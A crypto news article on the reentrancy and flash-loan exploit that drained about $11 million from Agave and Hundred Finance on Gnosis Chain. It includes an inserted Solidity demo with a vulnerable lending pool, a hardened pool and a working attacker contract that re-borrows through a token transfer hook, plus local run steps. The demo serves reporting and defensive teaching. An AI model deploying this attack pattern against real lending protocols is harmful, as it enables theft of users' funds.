DeFi protocols Agave and Hundred Finance exploited on Gnosis Chain for $11 million

Quick Take

  • The attacker exploited a reentrancy vulnerability in both protocols, using a flash loan to fund and scale the attack.
  • The projects lost a combined $11 million in the attack, hours after a similar incident involving Deus Finance.

An attacker has siphoned over $11 million from Agave and Hundred Finance in what appears to be a flash loan reentrancy attack on both DeFi protocols on the Gnosis chain.

The DeFi platforms each confirmed the hacks in Twitter posts on Tuesday, stating that their contracts have been paused to forestall further damage. The attack marks the second flash loan exploit recorded today as Deus Finance DAO also lost $3 million.

Examining the transaction breakdowns of both exploits on Tenderly shows that the attacker exploited a reentrancy vulnerability in each protocol. Reentrancy is a smart contract vulnerability, common in Solidity code, that arises when a contract makes an external call to an untrusted contract before it has finished updating its own state. The untrusted contract can then call back into the protocol while its accounting is still inconsistent, and repeat that call-back to drain funds.

In the case of Agave and Hundred Finance, the attacker triggered a reentrancy bug in both protocols and used a flash loan to scale it. The reentrancy appears centered on the “callAfterTransfer” function, a hook in the token contracts used on Gnosis Chain that calls the recipient after each transfer. Because neither lending protocol expected a token transfer to hand control to the recipient, each payout let the attacker’s contract call back in and borrow again before the previous borrow had been recorded, siphoning off massive swathes of liquidity.

In essence, the attacker made recursive borrow calls to siphon off user funds without putting up additional collateral. The attacker then ended the exploit with a “liquidationCall,” repaying the initial flash loan while still holding significant liquidity from both projects.
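The following stylized example, added here and not taken from Agave, Hundred Finance or the attacker’s transaction, shows the pattern the article describes: a token whose transfer calls a hook on the recipient (as Gnosis Chain bridged tokens do via callAfterTransfer), a lending pool that pays out before it records the debt, and an attacker contract that borrows again from inside the hook. The contract and function names (HookedToken, VulnerablePool, SafePool, Attacker, onTokenTransfer) are assumptions for illustration; the pool has no interest, oracle or liquidation logic, and transferFrom is kept hook-free only to keep the demo short.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Added example, not protocol code. Token with an ERC677-style post-transfer
// hook, modelled on bridged tokens that call the recipient after a transfer.
interface IERC677Receiver {
    function onTokenTransfer(address from, uint256 value, bytes calldata data)
        external returns (bool);
}

contract HookedToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    function mint(address to, uint256 amount) external { balanceOf[to] += amount; } // demo only
    function approve(address spender, uint256 amount) external { allowance[msg.sender][spender] = amount; }

    function transfer(address to, uint256 amount) external returns (bool) {
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        // The hook: control passes to `to` while the caller's own state may be half-updated.
        if (to.code.length > 0) {
            require(IERC677Receiver(to).onTokenTransfer(msg.sender, amount, ""), "hook");
        }
        return true;
    }

    // Hook-free here only to keep the demo short (a real ERC677 token may hook this too).
    function transferFrom(address from, address to, uint256 amount) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        balanceOf[from] -= amount;
        balanceOf[to] += amount;
        return true;
    }
}

// Shared lending-pool state: 1:1 collateral, no interest, no oracle (assumed simplification).
abstract contract Pool {
    HookedToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;

    constructor(HookedToken _token) { token = _token; }

    function deposit(uint256 amount) external {
        token.transferFrom(msg.sender, address(this), amount);
        collateral[msg.sender] += amount;
    }

    function borrow(uint256 amount) external virtual;
}

// Vulnerable: the token is sent (interaction) before the debt is recorded (effect).
contract VulnerablePool is Pool {
    constructor(HookedToken t) Pool(t) {}

    function borrow(uint256 amount) external override {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralized");
        token.transfer(msg.sender, amount); // hook fires here; debt is still unchanged
        debt[msg.sender] += amount;
    }
}

// Hardened: effects before interactions, plus a reentrancy guard as defence in depth.
contract SafePool is Pool {
    uint256 private locked = 1;
    modifier nonReentrant() { require(locked == 1, "reentrant"); locked = 2; _; locked = 1; }

    constructor(HookedToken t) Pool(t) {}

    function borrow(uint256 amount) external override nonReentrant {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralized");
        debt[msg.sender] += amount;         // effect first
        token.transfer(msg.sender, amount); // interaction last; a re-entry reverts the whole call
    }
}

// Attacker: deposits once, then borrows repeatedly from inside the token hook.
contract Attacker is IERC677Receiver {
    Pool public immutable pool;
    HookedToken public immutable token;
    uint256 private reentries;

    constructor(Pool _pool) { pool = _pool; token = _pool.token(); }

    function attack(uint256 amount, uint256 depth) external {
        reentries = depth;
        token.approve(address(pool), amount);
        pool.deposit(amount);
        pool.borrow(amount); // on VulnerablePool this pays (depth + 1) * amount against `amount` collateral
    }

    function onTokenTransfer(address, uint256 value, bytes calldata) external override returns (bool) {
        if (msg.sender == address(token) && reentries > 0) {
            reentries--;
            pool.borrow(value); // re-entry: the collateral check still passes on VulnerablePool
        }
        return true;
    }
}
```

To run it in a local EVM (Remix, Foundry or Hardhat): deploy HookedToken, mint liquidity to a VulnerablePool and a small seed to an Attacker pointed at that pool, then call attack(seed, 9); the attacker ends holding ten times its collateral while the pool’s debt record only catches up after the fact. Repeating the sequence against SafePool reverts inside the first hook call. The practical check for any Aave or Compound fork is the same: before listing a token, confirm whether its transfer path calls into the recipient, and treat every transfer to an arbitrary address as an external call that must come after state updates.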

The attacker has begun to launder the funds via Tornado Cash, but Etherscan hasn't labeled their address as associated with a DeFi exploit as of the time of writing.

Flash loan attacks continue

Agave is a lending protocol on the Gnosis chain and is a fork of the popular Aave protocol. Hundred Finance is a multi-chain lending project and is a fork of Compound.

Cream Finance, a DeFi lending protocol built on a Compound-derived codebase, suffered a similar flash loan reentrancy attack in August 2021, when a token with an ERC777 transfer hook was used to re-enter the protocol. That exploit led to the loss of roughly $19 million in crypto tokens from the project.

© 2022 The Block Crypto, Inc. All Rights Reserved. This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.
